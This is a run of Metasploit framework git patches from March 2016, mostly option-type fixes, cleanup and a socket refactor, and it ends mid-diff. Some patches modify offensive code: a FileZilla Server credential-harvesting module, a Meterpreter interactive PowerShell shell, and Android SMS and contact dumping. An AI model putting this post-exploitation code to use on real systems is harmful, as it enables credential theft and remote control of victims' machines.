b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index da27883df6..e1c7aef65f 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -77,7 +77,7 @@ class Metasploit4 < Msf::Exploit::Remote ], self.class) register_advanced_options( [ - OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']), + OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]), ], self.class) register_autofilter_ports([ 50013 ]) end diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 40a4dc77e1..54ee46d664 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Local register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), - OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]), OptString.new('REXENAME', [false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']), From 79c36c4f53caa8bd8a1874f15ddfe8daafe61008 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 16 Mar 2016 13:14:49 -0500 Subject: [PATCH 575/686] RPORT should be an OptPort --- lib/msf/core/exploit/smb/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/smb/client.rb b/lib/msf/core/exploit/smb/client.rb index b104b9e48a..df006885f7 100644 --- a/lib/msf/core/exploit/smb/client.rb +++ b/lib/msf/core/exploit/smb/client.rb @@ -64,7 +64,7 @@ module Msf register_options( [ Opt::RHOST, - OptInt.new('RPORT', [ true, 'Set the SMB service port', 445]) + OptPort.new('RPORT', [ true, 'The SMB service port', 445]) ], Msf::Exploit::Remote::SMB::Client) register_autofilter_ports([ 139, 445]) From 32fe9ae55dd9a33c58f398e4c6d8f83f9acb0826 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Wed, 16 Mar 2016 15:19:07 -0500 Subject: [PATCH 576/686] Remove dead version check in db_manager.rb The check appears to have been orphaned in the db_manager refactor, but I can't track down the exact commit. --- lib/msf/core/db_manager.rb | 10 ---------- spec/lib/msf/db_manager_spec.rb | 1 - 2 files changed, 11 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 60d421b617..4e4ba8315c 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -163,14 +163,4 @@ class Msf::DBManager true end - - # Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6. - # Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond. - def warn_about_rubies - if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/ - $stderr.puts "**************************************************************************************" - $stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/" - $stderr.puts "**************************************************************************************" - end - end end diff --git a/spec/lib/msf/db_manager_spec.rb b/spec/lib/msf/db_manager_spec.rb index 47ee28d2ec..9263da301e 100644 --- a/spec/lib/msf/db_manager_spec.rb +++ b/spec/lib/msf/db_manager_spec.rb @@ -52,5 +52,4 @@ RSpec.describe Msf::DBManager do it { is_expected.to respond_to :error } it { is_expected.to respond_to :initialize_database_support } it { is_expected.to respond_to :service_name_map } - it { is_expected.to respond_to :warn_about_rubies } end From 9e7a330ac849a746b4e68798a9bacd44a829837c Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 16 Mar 2016 15:47:29 -0500 Subject: [PATCH 577/686] OptInt -> OptPort --- modules/auxiliary/scanner/rdp/ms12_020_check.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index ee463ca505..4441d9915b 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) + OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) ], self.class) end From df2d0f7826a93fdd99f09d97c767a4e87a27c5f6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 17 Mar 2016 11:13:34 -0500 Subject: [PATCH 578/686] Indicate that output options take parameters --- .../meterpreter/ui/console/command_dispatcher/android.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 28b369bcaf..c3d0f48aa9 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -191,7 +191,7 @@ class Console::CommandDispatcher::Android path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_sms_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for sms list'] + '-o' => [ true, 'Output path for sms list'] ) dump_sms_opts.parse(args) do |opt, _idx, val| @@ -279,7 +279,7 @@ class Console::CommandDispatcher::Android dump_contacts_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for contacts list'] + '-o' => [ true, 'Output path for contacts list'] ) dump_contacts_opts.parse(args) do |opt, _idx, val| @@ -383,7 +383,7 @@ class Console::CommandDispatcher::Android dump_calllog_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for call log'] + '-o' => [ true, 'Output path for call log'] ) From 7b2d717280536bfacfb41cd42335573f9cd1e376 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 17 Mar 2016 14:39:28 -0500 Subject: [PATCH 579/686] Change ranking to manual and restore BAP2 count to 21 Since the exploit requires the target to be configured manually, it feel more appropriate to be ManualRanking. --- modules/auxiliary/server/browser_autopwn2.rb | 2 +- modules/exploits/windows/browser/ie_unsafe_scripting.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 24e7d68f64..1c28beee94 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options([ OptInt.new('ExploitReloadTimeout', [false, 'Number of milliseconds before trying the next exploit', 3000]), - OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 22]), + OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 21]), OptString.new('HTMLContent', [false, 'HTML Content', '']), OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]), OptInt.new('MaxSessionCount', [false, 'Number of sessions to get', -1]), diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 77c6106b8a..6eb4c6201a 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -8,7 +8,7 @@ require 'msf/util/exe' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE From b1b68294bb3295697097d49c6544e38c8a094d9b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 17 Mar 2016 14:41:23 -0500 Subject: [PATCH 580/686] Update class name --- modules/exploits/windows/browser/ie_unsafe_scripting.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 6eb4c6201a..e40b90c70a 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/util/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer From 115a033036f03ca12e0df10e7f4edf7672b7ff72 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 17 Mar 2016 16:27:02 -0500 Subject: [PATCH 581/686] Fix parsing the Last Server xml --- .../gather/credentials/filezilla_server.rb | 80 ++++++++++--------- 1 file changed, 43 insertions(+), 37 deletions(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index c2f67dffe4..4de9582e98 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -44,23 +44,22 @@ class Metasploit3 < Msf::Post locations << v + "\\FileZilla Server\\" end - begin - root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\FileZilla Server") - open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) - locations << open_key.query_value("install_dir").data + "\\" - rescue Rex::Post::Meterpreter::RequestError => e - vprint_error(e.message) - end + keys = [ + "HKLM\\SOFTWARE\\FileZilla Server", + "HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server", + ] - begin - root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server") - open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) - locations << open_key.query_value("install_dir").data + "\\" - rescue Rex::Post::Meterpreter::RequestError => e - vprint_error(e.message) + keys.each do |key| + begin + root_key, base_key = session.sys.registry.splitkey(key) + value = session.sys.registry.query_value_direct(root_key, base_key, "install_dir") + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + next + end + locations << value.data + "\\" end - locations = locations.uniq filezilla = check_filezilla(locations) get_filezilla_creds(filezilla) if filezilla @@ -77,7 +76,7 @@ class Metasploit3 < Msf::Post ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| if fdir == xmlfile filepath = location + xmlfile - print_status("Configuration file found: #{filepath}") + print_good("Configuration file found: #{filepath}") paths << filepath end end @@ -92,7 +91,7 @@ class Metasploit3 < Msf::Post end if !paths.empty? - print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{session.sid}") print_line return paths end @@ -184,7 +183,7 @@ class Metasploit3 < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['ftp_port'], service_name: 'ftp', protocol: 'tcp', @@ -213,7 +212,7 @@ class Metasploit3 < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end perms.each do |perm| @@ -225,13 +224,12 @@ class Metasploit3 < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) # report the goods! - if config['ftp_port'] == "" + if config['admin_pass'] == "" vprint_status("Detected Default Adminstration Settings:") - config['ftp_port'] = "21" else vprint_status("Collected the following configuration details:") service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['admin_port'], service_name: 'filezilla-admin', protocol: 'tcp', @@ -259,7 +257,7 @@ class Metasploit3 < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end vprint_status(" FTP Port: #{config['ftp_port']}") @@ -285,21 +283,21 @@ class Metasploit3 < Msf::Post rescue vprint_error("Could not parse FileZilla Server Interface.xml") end - p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, + loot_path = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials") - print_status("Credentials saved in: #{p.to_s}") + print_status("Credentials saved in: #{loot_path}") - p = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, + loot_path = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, "filezilla_server_permissions.csv", "FileZilla FTP Server Permissions") - print_status("Permissions saved in: #{p.to_s}") + print_status("Permissions saved in: #{loot_path}") - p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, + loot_path = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration") - print_status(" Config saved in: #{p.to_s}") + print_status(" Config saved in: #{loot_path}") - p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, + loot_path = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, "filezilla_server_lastserver.csv", "FileZilla FTP Last Server") - print_status(" Last server history: #{p.to_s}") + print_status(" Last server history: #{loot_path}") print_line end @@ -315,16 +313,16 @@ class Metasploit3 < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") end opt = doc.elements.to_a("Settings/Item") if opt[1].nil? # Default value will only have a single line, for admin port - no adminstration settings settings['admin_port'] = opt[0].text rescue "" - settings['ftp_port'] = "" + settings['ftp_port'] = 21 else - settings['ftp_port'] = opt[0].text rescue "" + settings['ftp_port'] = opt[0].text rescue 21 settings['admin_port'] = opt[16].text rescue "" end settings['admin_pass'] = opt[17].text rescue "" @@ -439,15 +437,23 @@ class Metasploit3 < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") + return lastser end opt = doc.elements.to_a("Settings/Item") - lastser['ip'] = opt[0].text rescue "" - lastser['port'] = opt[1].text rescue "" - lastser['password'] = opt[2].text rescue "" + opt.each do |item| + case item.attributes['name'] + when /Address/ + lastser['ip'] = item.text + when /Port/ + lastser['port'] = item.text + when /Password/ + lastser['password'] = item.text + end + end lastser['password'] = "" if lastser['password'].nil? From 9219efa51220177d4da7ce60a4e7c03d90ef86c8 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 18 Mar 2016 11:16:44 -0500 Subject: [PATCH 582/686] remove unreachable ruby 1.x check --- lib/msf/sanity.rb | 6 ------ 1 file changed, 6 deletions(-) diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index c77c217ed2..dc5ef2696d 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -3,12 +3,6 @@ # Provides some sanity checks against the ruby build and version # -# Check for ruby 1.x and throw a warning -if (RUBY_VERSION =~ /^1/) - $stderr.puts "*** Ruby 1.x is not supported, please upgrade to Ruby 2.1 or newer." - exit(0) -end - if(RUBY_PLATFORM == 'java') require 'socket' s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) From 6e12e74e02ce3ab0e3704e2092c789bf3f368113 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 18 Mar 2016 14:12:18 -0700 Subject: [PATCH 583/686] Bump version of framework to 4.11.17 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 2f39615c93..16570248b3 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.16) + metasploit-framework (4.11.17) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ed1dbf948b..11bbf7f4e7 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.16" + VERSION = "4.11.17" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From ebc731644263e63405f8904ff0b2b770de376d06 Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 19 Mar 2016 13:58:13 -0400 Subject: [PATCH 584/686] Spelling Fix Fixed Thorugh to Through --- modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 3d4ef14bc7..a540ab99c6 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor - placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. + placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, From 80e0bbeb68ae7510c3437f8013396296089fda71 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 14 Mar 2016 20:23:26 +1000 Subject: [PATCH 585/686] Add the interactive shell prompt with sessions --- .../extensions/powershell/powershell.rb | 19 +++++- .../meterpreter/extensions/powershell/tlv.rb | 5 +- .../console/command_dispatcher/powershell.rb | 58 +++++++++++++++---- 3 files changed, 68 insertions(+), 14 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb index 967756481d..d1211508d1 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -31,14 +31,29 @@ class Powershell < Extension end - def execute_string(code) + def execute_string(opts={}) + return nil unless opts[:code] + request = Packet.create_request('powershell_execute') - request.add_tlv(TLV_TYPE_POWERSHELL_CODE, code) + request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code]) + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] response = client.send_request(request) return response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT) end + def shell(opts={}) + request = Packet.create_request('powershell_shell') + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] + + response = client.send_request(request) + channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID) + if channel_id.nil? + raise Exception, "We did not get a channel back!" + end + Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS) + end + end end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb index e9e09daaf9..99612bed91 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -5,8 +5,9 @@ module Meterpreter module Extensions module Powershell -TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) -TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) +TLV_TYPE_POWERSHELL_SESSIONID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) +TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) +TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb index 5bb184e7c1..485799f5f6 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -29,16 +29,52 @@ class Console::CommandDispatcher::Powershell # def commands { - 'powershell_execute' => 'Execute a Powershell command string', + 'powershell_shell' => 'Create an interactive Powershell prompt', + 'powershell_execute' => 'Execute a Powershell command string' } end + @@powershell_shell_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to interact with.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_shell_usage + print_line('Usage: powershell_shell [-s session-id]') + print_line + print_line('Creates an interactive Powershell prompt.') + print_line(@@powershell_shell_opts.usage) + end + + # + # Create an interactive powershell prompts + # + def cmd_powershell_shell(*args) + if args.include?('-h') + powershell_shell_usage + return false + end + + opts = {} + + @@powershell_shell_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + channel = client.powershell.shell(opts) + shell.interact_with_channel(channel) + end + @@powershell_execute_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], '-h' => [false, 'Help banner'] ) def powershell_execute_usage - print_line('Usage: powershell_execute ') + print_line('Usage: powershell_execute [-s session-id]') print_line print_line('Runs the given Powershell string on the target.') print_line(@@powershell_execute_opts.usage) @@ -53,16 +89,18 @@ class Console::CommandDispatcher::Powershell return false end - code = args.shift - - @@powershell_execute_opts.parse(args) { |opt, idx, val| - #case opt - #when '-r' - # result_var = val - #end + opts = { + code: args.shift } - result = client.powershell.execute_string(code) + @@powershell_execute_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + result = client.powershell.execute_string(opts) print_good("Command execution completed:\n#{result}") end From c871ceea0a55cf92142f0bf066abe6dbf68205d2 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Mon, 21 Mar 2016 00:53:34 -0400 Subject: [PATCH 586/686] Implement consistent socket abstraction In current nomenclature, Rex Sockets are objects created by calls to Rex::Socket::.create and Rex::Socket.create_... When the LocalHost or Comm parameters are set to remotely routed addresses (currently via Meterpreter sessions), Rex will create a Channel which will abstract communications with the remote end of the session. These channel based abstractions are called pivots, and present in three separate flavors: 1 - TcpClientChannel, a fully abstracted, selectable Socket. 2 - TcpServerChannel, a virtual Channel which distributes client channels. 3 - UdpChannel, a virtual Channel which provides common methods for UDP socket operations, but is not a full (selectable) abstraction. Unfortunately this differentiation results in inconsistent returns from the aforementioned socket creation calls, as the call chain creates parameters and supplies them to the create method on the comm object referenced in the params. The comm object may be a channel, and produce a virtual representation of a socket with functional methods analogous to Sockets, but without a kernel FD. This commit begins the work of ensuring that all calls for socket creation return selectable Rex::Socket objects with semantics familiar to Ruby developers who have not read into the details of Rex::Socket and Rex::Post. ----- Summary of changes: Convert Rex::IO::StreamAbstraction to SocketAbstraction and use the new mixin in StreamAbstraction and DatagramAbstraction. This approach allows for common methods to reuse the abstraction data flow, while initializing separate types of socket obects and an optional monitor as needed. In the Rex::Post::Meterpreter namespace, extract common methods from Stream to a SocketAbstraction mixin, include that mixin in Stream, and add Datagram with the dio_write handler override exported from the current implementation of UdpChannel, also using the mixin. This relies on the Rex::IO work above to implement the proper type of socket abstraction to the Channel descendants. In Rex::Post::Meterpreter::Extensions::Stdapi::Net, convert the UdpChannel to inherit from the Rex::Post::Meterpreter::Datagram class, implementing only the send method at this tier. Convert create_udp_channel to return the local socket side of the datagram abstraction presented analogous to the TcpClientChannel approach used before. ----- Notes and intricacies: In order to implement recvfrom on the UDP abstraction, a shim layer has been put in place to forward the sockaddr information from the remote peer to the local UDP socketpair in the abstraction. This information takes up buffer space in the UDP socket, and in order to maintain compatibility with consumers, the dio_write_handler pushes the data buffer, and in a separate send call, he sockaddr information from the remote socket. On the abstraction side, the recvfrom_nonblock call of the real UDPSocket has been overriden via the mixed in module to call the real method twice, once for the data buffer, and once for the packed sockaddr data. The Rex level consumer for recvfrom calls the underlying nonblock method and expects this exact set of returns (as opposed to what standard library UDPSocket.recvfrom returns, which is a data buffer and an Array of sockaddr data). ----- Testing: Local and lab testing only so far. Test RC script to be added in GH comments. ----- Issues: Currently, sendto on a remote socket does not appear to honor LocalPort which causes DNS responses (#6611) to come from the wrong port to remote clients being serviced over a pivot socket. --- lib/rex/io/datagram_abstraction.rb | 16 +- lib/rex/io/socket_abstraction.rb | 205 ++++++++++++++++++ lib/rex/io/stream_abstraction.rb | 183 +--------------- lib/rex/post/meterpreter/channels/datagram.rb | 75 +++++++ .../channels/socket_abstraction.rb | 161 ++++++++++++++ lib/rex/post/meterpreter/channels/stream.rb | 59 +---- .../extensions/stdapi/net/socket.rb | 6 +- .../socket_subsystem/tcp_client_channel.rb | 68 ------ .../net/socket_subsystem/udp_channel.rb | 131 +---------- 9 files changed, 470 insertions(+), 434 deletions(-) create mode 100644 lib/rex/io/socket_abstraction.rb create mode 100644 lib/rex/post/meterpreter/channels/datagram.rb create mode 100644 lib/rex/post/meterpreter/channels/socket_abstraction.rb diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index e1b17a1d6c..a052a13b1f 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb @@ -1,6 +1,6 @@ # -*- coding: binary -*- -require 'socket' +require 'rex/io/socket_abstraction' module Rex module IO @@ -12,24 +12,14 @@ module IO # ### module DatagramAbstraction - + include Rex::IO::SocketAbstraction # # Creates a streaming socket pair # def initialize_abstraction - self.lsock, self.rsock = Rex::Socket.udp_socket_pair() + self.lsock, self.rsock = Rex::Socket.udp_socket_pair end - - # The left side of the stream (local) - attr_reader :lsock - # The right side of the stream (remote) - attr_reader :rsock - -protected - attr_writer :lsock - attr_writer :rsock - end end; end diff --git a/lib/rex/io/socket_abstraction.rb b/lib/rex/io/socket_abstraction.rb new file mode 100644 index 0000000000..c010c8a1b9 --- /dev/null +++ b/lib/rex/io/socket_abstraction.rb @@ -0,0 +1,205 @@ +# -*- coding: binary -*- + +require 'socket' +require 'fcntl' + +module Rex +module IO + +### +# +# This class provides an abstraction to a stream based +# connection through the use of a streaming socketpair. +# +### +module SocketAbstraction + + ### + # + # Extension information for required Stream interface. + # + ### + module Ext + + # + # Initializes peer information. + # + def initinfo(peer,local) + @peer = peer + @local = local + end + + # + # Symbolic peer information. + # + def peerinfo + (@peer || "Remote Pipe") + end + + # + # Symbolic local information. + # + def localinfo + (@local || "Local Pipe") + end + end + + # + # Override this method to init the abstraction + # + def initialize_abstraction + self.lsock, self.rsock = Rex::Compat.pipe + end + + # + # This method cleans up the abstraction layer. + # + def cleanup_abstraction + self.lsock.close if (self.lsock and !self.lsock.closed?) + self.rsock.close if (self.rsock and !self.rsock.closed?) + + self.lsock = nil + self.rsock = nil + end + + # + # Low-level write to the local side. + # + def syswrite(buffer) + lsock.syswrite(buffer) + end + + # + # Low-level read from the local side. + # + def sysread(length) + lsock.sysread(length) + end + + # + # Shuts down the local side of the stream abstraction. + # + def shutdown(how) + lsock.shutdown(how) + end + + # + # Closes both sides of the stream abstraction. + # + def close + cleanup_abstraction + super + end + + # + # Symbolic peer information. + # + def peerinfo + "Remote-side of Pipe" + end + + # + # Symbolic local information. + # + def localinfo + "Local-side of Pipe" + end + + # + # The left side of the stream. + # + attr_reader :lsock + # + # The right side of the stream. + # + attr_reader :rsock + +protected + + def monitor_rsock(threadname = "SocketMonitorRemote") + self.monitor_thread = Rex::ThreadFactory.spawn(threadname, false) { + loop do + closed = false + buf = nil + + if not self.rsock + wlog("monitor_rsock: the remote socket is nil, exiting loop") + break + end + + begin + s = Rex::ThreadSafe.select( [ self.rsock ], nil, nil, 0.2 ) + if( s == nil || s[0] == nil ) + next + end + rescue Exception => e + wlog("monitor_rsock: exception during select: #{e.class} #{e}") + closed = true + end + + if( closed == false ) + begin + buf = self.rsock.sysread( 32768 ) + if buf == nil + closed = true + wlog("monitor_rsock: closed remote socket due to nil read") + end + rescue EOFError => e + closed = true + dlog("monitor_rsock: EOF in rsock") + rescue ::Exception => e + closed = true + wlog("monitor_rsock: exception during read: #{e.class} #{e}") + end + end + + if( closed == false ) + total_sent = 0 + total_length = buf.length + while( total_sent < total_length ) + begin + data = buf[total_sent, buf.length] + + # Note that this must be write() NOT syswrite() or put() or anything like it. + # Using syswrite() breaks SSL streams. + sent = self.write( data ) + + # sf: Only remove the data off the queue is write was successfull. + # This way we naturally perform a resend if a failure occured. + # Catches an edge case with meterpreter TCP channels where remote send + # failes gracefully and a resend is required. + if (sent.nil?) + closed = true + wlog("monitor_rsock: failed writing, socket must be dead") + break + elsif (sent > 0) + total_sent += sent + end + rescue ::IOError, ::EOFError => e + closed = true + wlog("monitor_rsock: exception during write: #{e.class} #{e}") + break + end + end + end + + if( closed ) + begin + self.close_write if self.respond_to?('close_write') + rescue IOError + end + break + end + end + } + end + +protected + attr_accessor :monitor_thread + attr_writer :lsock + attr_writer :rsock + +end + +end; end + diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index c2bfb5d4a2..837cfd945a 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -1,7 +1,6 @@ # -*- coding: binary -*- -require 'socket' -require 'fcntl' +require 'rex/io/socket_abstraction' module Rex module IO @@ -13,36 +12,7 @@ module IO # ### module 